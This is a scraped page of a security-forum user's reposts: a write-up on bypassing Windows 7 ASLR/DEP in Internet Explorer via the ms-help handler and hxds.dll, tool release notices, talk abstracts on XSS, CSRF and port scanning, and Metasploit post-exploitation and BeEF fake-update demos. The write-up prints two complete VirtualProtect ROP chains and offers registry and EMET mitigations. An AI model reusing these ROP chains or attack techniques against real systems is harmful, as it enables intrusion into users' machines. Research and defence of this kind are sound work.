Security Level of the Java Client Sursa: Exploiting and mitigating Java exploits in Internet Explorer | GreyHatHacker.NET
  8. Nytro
    Bypassing Microsoft Windows ASLR with a little help by MS-Help Exploiting vulnerabilities on Windows 7 is not as easy as it used to be on Windows XP. Writing an exploit to bypass ASLR and DEP on Windows 7 was still relatively easy if Java 6 was installed as it got shipped with non aslr msvcr71.dll library. Now that Java 7 has been out for a while hopefully everyone should be using this version as msvcr71.dll does not exist with Java 7. With this in mind creating a reliable ROP chain is going to be difficult again as finding some information leak my guess is not going to be a straight forward not to mention the time it would take to create our ROP chain if a leak even exists. So I set myself the task to see if I could create a reliable static ROP chain on a fully patched Windows 7 machine with and without Microsoft Office. Windows 7 only After carrying out a default installation of Windows 7 sp1 (Enterprise) and getting it all up-to-date with patches I carried out a scan of all non aslr DLLs on the system and was amazed to find nearly 600 non alsr DLLs. Ok a lot were duplicates so removing these from my list I ended up with around 200 unique DLLs to play with. One way I thought I could possibly load the library in Internet Explorer is by calling a classid object tag so after searching for clsid string in the DLLs one library stood out “VsaVb7rt.dll” Filename - VsaVb7rt.dll Path - C:\Windows\Microsoft.NET\Framework\v2.0.50727\ MD5 hash - 22f450c23d8abdfa6bed991ad1c34b1c Size - 1,340,752 bytes Signed - 29th September 2010 08:46:12 After obtaining the classid guid using the tool Bintext I loaded it up in the browser <HTML> <OBJECT classid='clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F' </OBJECT> </HTML> The issue with loading libraries via guids is that user interaction is first required before exploiting so in the real world this would not be a viable option unless your testing your own exploits from a specific address. Once accepting the security warning it writes to the registry entry below Windows 7 with MSOffice 2007/2010 With Windows 7 being a failure I turned my attention to Office 2007. As most users running Windows 7 should be running Office 2010 or the very least running Office 2007. After a default installation of “Microsoft Office 2007 Plus”, getting it fully up-to-date and carrying a another scan a number of additional non aslr DLLs where found that could be loaded via its own guids as above but again pretty useless with the prompts given. After browsing/grepping the strings in the libraries I found one library that could be loaded in Internet Explorer without any interaction and that library being “hxds.dll” . This library can be loaded using its protocol handler by location.href = ‘ms-help:’ <SCRIPT language="JavaScript"> location.href = 'ms-help:' </SCRIPT> This library does not get rebased either so is perfect for our ROP chain. Carrying out the same routine with “Microsoft Office 2010 Plus” I found the same library “hxds.dll” that we can use but our ROP chain would be different as the file has been updated. Details of the library on Office 2007 Filename - hxds.dll Path - C:\Program Files\Common Files\microsoft shared\Help\ MD5 hash - 9e7370cc3d6a43942433f85d0e2bbdd8 Size - 873,216 bytes Signed - 19th August 2006 11:52:41 Details of the library on Office 2010 Filename - hxds.dll Path - C:\Program Files\Common Files\microsoft shared\Help\ MD5 hash - 23fdb0c309e188a5e3c767f8fc557d83 Size - 877,368 bytes Signed - 23rd May 2009 12:24:33 Here is the ROP chain generated by Mona.py on Office 2007 0x51be25dc, # POP EDI # RETN [hxds.dll] 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll] 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll] 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll] 0x51bf1761, # POP EBP # RETN [hxds.dll] 0x51c4b2df, # & call esp [hxds.dll] 0x51bf2e19, # POP EBX # RETN [hxds.dll] 0x00000201, # 0x00000201-> ebx 0x51bfa969, # POP EDX # RETN [hxds.dll] 0x00000040, # 0x00000040-> edx 0x51c385a2, # POP ECX # RETN [hxds.dll] 0x51c5b991, # &Writable location [hxds.dll] 0x51bf7b52, # POP EDI # RETN [hxds.dll] 0x51c3f011, # RETN (ROP NOP) [hxds.dll] 0x51c433d7, # POP EAX # RETN [hxds.dll] 0x90909090, # nop 0x51c0a4ec, # PUSHAD # RETN [hxds.dll] and the ROP chain on Office 2010 0x51bf34b4, # POP ESI # RETN [hxds.dll] 0x51bd10b8, # ptr to &VirtualProtect() [IAT hxds.dll] 0x51bd2d97, # MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll] 0x51bdcba0, # XCHG EAX,ESI # RETN 00 [hxds.dll] 0x51c379e2, # POP EBP # RETN [hxds.dll] 0x51c59683, # & call esp [hxds.dll] 0x51be198c, # POP EBX # RETN [hxds.dll] 0x00000201, # 0x00000201-> ebx 0x51c35ac3, # POP EDX # RETN [hxds.dll] 0x00000040, # 0x00000040-> edx 0x51becf3e, # POP ECX # RETN [hxds.dll] 0x51c5d150, # &Writable location [hxds.dll] 0x51bef563, # POP EDI # RETN [hxds.dll] 0x51c07402, # RETN (ROP NOP) [hxds.dll] 0x51c56fbd, # POP EAX # RETN [hxds.dll] 0x90909090, # nop 0x51c3604e, # PUSHAD # RETN [hxds.dll] In order for our exploit to be successful I’ve seen its best to call the protocol handler after the heap spray and before triggering the vulnerability. Finally here is an exploit (password “answerworks”, md5hash 5bc94894890298710f30d91d6104e568) based from my last post where I have just changed the ROP chain from using msvcr71.dll to using hxds.dll. For now I see two options to mitigate this, one is to disable the protocol handler which can be done easily by changing the name or value in the registry or delete it completely. The downside is that I don’t know how it would impact applications using this handler. [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-help] @="Help HxProtocol" "CLSID"="{314111c7-a502-11d2-bbca-00c04f8ec294}" The second option would be to get Microsoft EMET installed if you haven’t already done so and make sure “MandatoryASLR” is enabled for the iexplore.exe process. I can’t emphasize enough how vital it is to have this tool installed so please do not delay and get it deployed ASAP. Sursa: Bypassing Microsoft Windows ASLR with a little help by MS-Help | GreyHatHacker.NET
  9. Nytro
    E Tinkode in caz ca nu v-ati prins.
  10. Nytro
    Pff, si eu voiam sa fac asa ceva. Dar arata foarte bine
  11. Nytro
    Ce barfe despre tine? Avem o alta vedeta? Nu am mai auzit nimic despre tine de la... chestia de dinainte de Defcamp. Cat despre tex lumea vorbeste mult fara sa cunoasca, nici eu nu stiu prea multe, dar eu ma abtin de la diverse comentarii.
  12. Nytro
    Mptcp Packet Manipulator 1.9.0 Authored by Khun | Site hexcodes.org Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address. Changes: Added support for Display Packet Content (tcpdump style). More hard compiler optimizations. Full support for Darwin OS. Various other additions and improvements. Download: http://packetstormsecurity.org/files/download/119132/mptcp-1.9.0.tar.gz Sursa: Mptcp Packet Manipulator 1.9.0 ? Packet Storm
  13. Nytro
    Malheur Malware Analyzer 0.5.3 Authored by Konrad Rieck | Site mlsec.org Malheur is a tool for automatic analysis of program behavior recorded from malicious software (malware). It is designed to support the regular analysis of malicious software and the development of detection and defense measures. It allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes. It can be applied to recorded program behavior of various formats as long as monitored events are separated by delimiter symbols, e.g. as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox, and Joebox. Changes: The tool's persistent state is stored in the local state directory for better maintenance. Several minor bugs have been fixed. Download: http://packetstormsecurity.org/files/download/119128/malheur-0.5.3.tar.gz Sursa: Malheur Malware Analyzer 0.5.3 ? Packet Storm
  14. Nytro
    Insecure Authentication Control In J2EE Authored by Ashish Rao This is a whitepaper discussing insecure authentication control in J2EE implemented using sendRedirect(). Download: http://packetstormsecurity.org/files/download/119129/insecureauth-j2ee.pdf Sursa: Insecure Authentication Control In J2EE ? Packet Storm
  15. Nytro
    Hashcat's GPU-accelerated Gauss encryption cracker GReAT Kaspersky Lab Expert Posted December 28, 10:45 GMT 2012 was a year full of major security incidents: Flame, Shamoon, Flashback, Wiper, Gauss, and so on. As we are about to turn the page, many unsolved mysteries remain still. Perhaps the most interesting unsolved mysteries are related to the Gauss Trojan: the Palida Narrow font and the unknown encrypted payload. Previously, we’ve published a blogpost about the encrypted payload hoping that the crypto community will take on the challenge and break the encryption scheme to reveal the true purpose of the mysterious malware. Yesterday, Jens ‘atom’ Steube, who is best known as the author of ‘(ocl)hashcat’ - a GPU accelerated password recovery tool, released his Gauss cracker as open source software under a GPL license. This is a major breakthrough towards solving the Gauss encryption scheme because of the speeds it achieves: 489k c/s on a AMD Radeon HD 7970 card. If you’re wondering, this is over 30 times faster than an AMD FX 8120 CPU. You can download the sources and Linux binary from Jens’ 'hashcat' page. Happy New (Cracking) Year! Download: https://hashcat.net/oclGaussCrack/ Sursa: Hashcat's GPU-accelerated Gauss encryption cracker - Securelist
  16. Nytro
    [h=1]Analysts: Anonymous to decline in 2013[/h]By Brett Winterford on Dec 28, 2012 9:54 AM (14 hours ago) [h=2]Security vendor finds hacking group predictable.[/h] Senior security researchers at Intel-owned security vendor McAfee have dubbed 2013 the year the Anonymous hacking collective will face stagnation and decline. Anonymous, a ‘loosely connected’ hacktivist movement that sprung up from 4Chan in 2003, has for a decade directed cyber-attacks at targets as varied as News Corp, The US, UK and Australian Governments, suspected pedophilia rings, the Church of Scientology and various rights holder groups such as record and film companies. Such was Anonymous’ momentum and impact that Time Magazine named the collective the ‘Person of the Year’ in 2012. But McAfee analysts, releasing their 2013 predictions, have gauged that Anonymous’ techniques are now well understood and predicted its influence will decline. “Sympathisers of Anonymous are suffering,” the analysts wrote. “Too many uncoordinated and unclear operations have been detrimental to its reputation.” “Anonymous’ level of technical sophistication has stagnated,” McAfee said, referring to the group's reliance on Distributed Denial of Service attacks, “and its tactics are better understood by its potential victims.” The analysts said Anonymous may draw new support from alliances with anti-globalisation groups such as splinters of the Occupy Wall Street movement. The future for hacktivism, the analysts said, is in the hands of individuals and groups prepared to be named when hacking for a cause they feel are just. McAfee analyst Francois Paget has argued for over 12 months that this strategy will prevail so long as Anonymous hackers are willing to out each other. A larger concern, the analysts said, is the growing numbers and sophistication of groups of “patriot” hackers attacking institutions that do not subscribe to their political world view – not to mention the sanctioned cyber-armies of nation states. Among McAfee’s other predictions: Rapid development of ways to attack Windows 8 and HTML5. The rise of mobile worms that buy malicious apps and steal via tap-and-pay NFC. Large-scale attacks like Stuxnet that attempt to destroy infrastructure. SMS spam from infected phones. “Hacking as a Service” and the rise of mobile phone ransomware “kits”. Nation states and armies will be more frequent sources and victims of cyberthreats. Sursa: Analysts: Anonymous to decline in 2013 - Security - Technology - News - iTnews.com.au
  17. Nytro
    THC-IPv6 Attack Tool 2.1 Authored by van Hauser, thc | Site thc.org THC-IPv6 is a toolkit that attacks the inherent protocol weaknesses of IPv6 and ICMP6 and it includes an easy to use packet factory library. Changes: 4 new tools, features, and bug fixes Download: http://packetstormsecurity.org/files/download/119116/thc-ipv6-2.1.tar.gz Sursa: THC-IPv6 Attack Tool 2.1 ? Packet Storm
  18. Nytro
    E clar
  19. Nytro
    Eu am doar o curiozitate. Cum adica "eth0"? Ce inseamna interfata Ethernet "eth0" in terminologia voastra?
  20. Nytro
    Beef Fake Browser Update Exploitation Description: In this video I will show you how to use BeEF Framework for fake browser update exploitation. Fake Browser Update : - In BeEF Framework there is a new feature available in social-engineering called Clippy using this feature we are sending the fake Update notification and if user click on that so obviously he is going to install that exe and other side you will get the meterpreter session. Very easy to perform but very good for social-engineering. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. BeEF : - BeEF - The Browser Exploitation Framework Project PDF : - BeEF Fake Browser Update Exploitation.pdf Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef Fake Browser Update Exploitation
  21. Nytro
    Linux Post - Exploitation Using Metasploit Framework Description: In this video I will show you how to perform post exploitation on a Linux system using Metasploit Framework. So, In Metasploit there is 9-10 modules available for Linux post exploitation all modules are working very well. I thing this modules are best for Post – Exploitation on Linux very easy to use and effective. Modules are used .. Linux Gather Dump Password Hashes for Linux Systems | Metasploit Exploit Database (DB) Post Module to dump the password hashes for all users on a Linux System Linux Gather Virtual Environment Detection | Metasploit Exploit Database (DB) This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM. Linux Gather Configurations | Metasploit Exploit Database (DB) This module collects configuration files found on commonly installed applications and services, such as Apache, MySQL, Samba, Sendmail, etc. If a config file is found in its default path, the module will assume that is the file we want. Linux Gather Network Information | Metasploit Exploit Database (DB) This module gathers network information from the target system IPTables rules, interfaces, wireless information, open and listening ports, active network connections, DNS information and SSH information. Linux Gather Protection Enumeration | Metasploit Exploit Database (DB) This module tries to find certain installed applications that can be used to prevent, or detect our attacks, which is done by locating certain binary locations, and see if they are indeed executables. For example, if we are able to run 'snort' as a command, we assume it's one of the files we are looking for. This module is meant to cover various antivirus, rootkits, IDS/IPS, firewalls, and other software. Linux Gather System and User Information | Metasploit Exploit Database (DB) This module gathers system information. We collect installed packages, installed services, mount information, user list, user bash history and cron jobs Linux Gather User History | Metasploit Exploit Database (DB) This module gathers user specific information. User list, bash history, mysql history, vim history, lastlog and sudoers. Source : - Penetration Testing Software | Metasploit PDF : - Linux Post Exploitation.pdf Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Tags: post-exploitation , hacking , hack , Sursa: Linux Post - Exploitation Using Metasploit Framework
  22. Nytro
    Web Framework Vulnerabilties Description: Abstract This talk will give participants an opportunity to practically code review Web Application Framework based applications for security vulnerabilities. The material in this talk covers the common vulnerability anti-patterns which show up in applications built on the most popular enterprise web application frameworks (Struts 2, Spring MVC, Ruby on Rails, and .NET MVC). Sample applications are provided with guided tasks to ease participants into understanding the vulnerabilities in each framework and the overall steps a code reviewer should follow to identify these vulnerabilities. This talk is trimmed down version of the 3 hour workshop given at Blackhat. This is an advanced talk and an understand of the application frameworks is a prerequisite to get the most out of this talk. ***** Speaker: Abraham Kang, Principal Security Researcher, HP Fortify Abraham Kang is fascinated with the nuanced details associated with programming languages and their associated APIs in terms of how they affect security. Abraham has a Bachelor of Science from Cornell University. Abraham currently works for HP Fortify as a Principal Security Researcher. Prior to joining Fortify, Abraham worked with application security for over 10 years with the most recent 4 years being a security code reviewer at Wells Fargo. Abraham is focused on application, framework, and mobile security and presented his findings at Blackhat USA, BSIDES, OWASP, Baythreat and HP Protect. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Web Framework Vulnerabilties - Abraham Kang on Vimeo Sursa: Web Framework Vulnerabilties
  23. Nytro
    Hacking With Web Sockets Description: Abstract HTML5 isn't just for watching videos on your iPad. Its features may be the target of a security attack as much as they may be used to improve an attack. Vulnerabilities like XSS have been around since the web's beginning, but exploiting them has become increasingly sophisticated. HTML5 features like WebSockets are part of the framework for controlling browsers compromised by XSS. This presentation provides an overview of WebSockets: How they might increase the attack surface of a web site, their implications for privacy, and the potential security problems with protocols tunneled over them. Then it demonstrates how WebSockets can be used as an effective part of a hacking framework. It closes with recommendations for deploying WebSockets securely, applying security principles to web app design, and providing a tool for exploring WebSockets security. ***** Speaker: Vaagn Toukharian - Senior Software Engineer, Qualys Senior Software Engineer for Qualys's Web Application Scanner. | Was involved with security industry since 1999. | Experience includes work on Certification Authority systems, encryption devices, large CAD systems, Web scanners. | Outside of work interests include IronMan triathlons and photography. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Hacking with Web Sockets - Vaagn Toukharian on Vimeo Sursa: Hacking With Web Sockets
  24. Nytro
    Cross Site Port Scanning Description: Abstract Several web applications provide functionality to pull data from other Internet facing Web Applications for either internal use or to verify application availability. We see this in the form of applications pulling images using user specified URLs, applications showing server status for user specified URLs, applications pulling feeds, XML and manifest files etc. An attacker can abuse this functionality to send crafted queries to a remote web server using the application that provides this functionality. The responses can be studied and in the case of unique responses, can be abused to do a blind port scan on any Internet facing device or even on internal local networks and the same server/host. In this paper we will see how this commonly available functionality in most web applications can be abused by attackers to port scan other servers, or perform a Cross Site Port Scan (XSPS). I found this issue with Facebook, where I was able to port scan any Internet facing server using Facebook’s IP addresses. Consecutively, I was able to identify this issue in several other prominent Web Applications on the Internet, including Google, Apigee, StatMyWeb, Mozilla.org, Face.com, Pinterest, Yahoo, Adobe and several others. We will take a look at the vulnerabilities that were present in the above mentioned web applications that allowed me to abuse the functionality to perform port scans on remote servers using predefined functionality. An attacker can abuse this by specifying URLs in the form of servername: to the application and review the response obtained. I have seen three unique responses based on port and service. The following are the different errors/response messages obtained: 1. For an open port running an HTTP service, the error/server response is specific to the call. An attacker may see HTML content or a function specific message like “Image not found” or “Invalid data stream” 2. For an open port running a service other than HTTP (like SSH, TELNET, SMTP or RDP), the error/server response is mostly generic like “Invalid data stream”, “Expected content-type was invalid” or “Received HTTP error code -1 while fetching source feed” 3. For a closed port, the errors/server responses are often descriptive like “HTTP/1.1 503 Service Unavailable”, “[Errno 101] Network is unreachable” or “DOWNLOAD_ERROR_CONNECTION_REFUSED” etc. Based on these error messages, which are unique for every server tested, we can conclusively identify closed and open ports on remote servers. Even better in some cases, the application displays the actual responses received in raw format allowing us to use it for banner grabbing. Cross Site Port Scanning is a technique that allows an attacker to abuse perfectly common functionality, like fetching a file or data from a remote server, to perform blind port scans on Internet facing servers. An application which accepts user input as a URL, fetches content from the user supplied URL and displays non-generic errors, is vulnerable to XSPS. An attacker can also enumerate ports on the server that makes the HTTP request on behalf of the user by providing a localhost as the URL with a port parameter. Simply put, an application that accepts a URL like site/images/derp.jpg fetches the content on the server side and displays the image, is vulnerable, if it displays port status or connection specific errors when a user requests the following URLs: site:22/images/nonexistentimage.jpg site:23/images/nonexistentimage.jpg site:3128/images/nonexistentimage.jpg site:3389/images/nonexistentimage.jpg An attacker would then be able to analyze the error messages and identify open and closed ports based on unique error responses. These responses may be raw socket errors (like “Connection refused” or timeouts) or may be customized by the application (like “Unexpected header found” or “Service was not reachable”) ***** Speaker: Riyaz Walikar I am a Web Application Security Engineer / Pentester / Network Security Architect for food, shelter, fun and passion. I have had luck with finding vulnerabilities with popular web applications like Facebook, Twitter, Google, Cisco, Symantec, Mozilla, PayPal, Ebay, Apigee etc. for which I am on the Hall of Fame for most of these services. You can follow me on twitter @riyazwalikar My interests lie with vulnerability research, breaking web applications, playing CTFs, finding new ways into computer networks, playing football and fishing.. riyazwalikar.com Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Cross Site Port Scanning - Riyaz Walikar on Vimeo Sursa: Cross Site Port Scanning
  25. Nytro
    Xss And Csrf With Html5 - Attack, Exploit And Defense Description: Abstract HTML5 has empowered browser with a number of new features and functionalities. Browsers with this new architecture include features like XMLHttpRequest Object (L2), Local Storage, File System APIs, WebSQL, WebSocket, File APIs and many more. The browser is emerging as a platform like a little operating system and expanded its attack surface significantly. Applications developed in this new architecture are exposed to an interesting set of vulnerabilities and exploits. Both traditional vulnerabilities like CSRF and XSS can be exploited in this new HTML5 architecture. In this talk we will cover following new attack vectors and variants of XSS and CSRF. HTML5 driven CSRF with XMLHttpRequest (Level 2) CSRF with two way attack stream Cross Site Response Extraction attacks using CSRF Cross Origing Resource Sharing (CORS) policy hacking and CSRF injections DOM based XSS with HTML5 applications Exploiting HTML5 tags, attributes and events DOM variable extraction with XSS Exploiting Storage, File System and WebSQL with HTML5 XSS Layered XSS and making it sticky with HTML5 based iframe sandbox Jacking with HTML5 tags and features In this session we will cover new methodology and tools along with some real life cases and demonstration. At the end we will cover some interesting defense methodologies to secure your HTML5 applications. ***** Speaker: Shreeraj Shah Shreeraj Shah, B.E., MSCS, MBA, is the founder of Blueinfy and iAppSecure Solution. Prior to founding Blueinfy, he was founder and board member at Net Square. He also worked with Foundstone (McAfee), Chase Manhattan Bank and IBM in security space. He is also the author of popular books like Web 2.0 Security, Hacking Web Services and Web Hacking: Attacks and Defense. In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, ISACA etc. His articles are regularly published on Securityfocus, InformIT, DevX, O’reilly and HNS. His work has been quoted on BBC, Dark Reading, Bank Technology, MIT Technology Review, SecurityWeek as an expert in the area of HTML5, Web 2.0 and Browser technologies and security. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: XSS & CSRF with HTML5 - Attack, Exploit and Defense - Shreeraj Shah on Vimeo Sursa: Xss And Csrf With Html5 - Attack, Exploit And Defense
×
×
  • Create New...